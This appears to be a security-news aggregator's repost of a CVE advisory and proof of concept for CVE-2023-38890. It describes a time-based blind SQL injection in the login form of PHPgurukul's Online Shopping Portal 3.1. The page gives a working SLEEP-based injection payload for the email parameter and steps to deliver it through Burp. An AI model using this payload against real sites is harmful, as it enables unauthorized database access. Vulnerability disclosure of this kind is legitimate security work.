Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-38890: GitHub - akshadjoshi/CVE-2023-38890: poc

Online Shopping Portal Project 3.1 allows remote attackers to execute arbitrary SQL commands/queries via the login form, leading to unauthorized access and potential data manipulation. This vulnerability arises due to insufficient validation of user-supplied input in the username field, enabling SQL Injection attacks.

CVE
#sql#vulnerability#linux#git#php#auth

CVE-2023-38890****Description

Online Shopping Portal Project V3.1 allows remote attackers to execute arbitrary SQL commands/queries via the login form, leading to unauthorized access and potential data manipulation. This vulnerability arises due to insufficient validation of user-supplied input in the username field, enabling SQL Injection attacks.

Exploit Title: Online Shopping Portal Project V3.1 PHPgurukul - Time-Based Blind Sqli

Exploit Author: Akshad Joshi

Vendor Homepage: https://phpgurukul.com

Software Link: https://phpgurukul.com/shopping-portal-free-download/

Tested on: Linux

Steps to Reproduce

use this payload (url encode it):

[email protected]’ AND (SELECT 1866 FROM (SELECT(SLEEP(10)))JHcH) AND 'GMDH’=’GMDH

  1. visit-http://localhost/shopping/login.php
  2. login via the account you created.
  3. there is front end validation so capture the request in burp .
  4. pass the above payload in email parameter and observe the response time

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907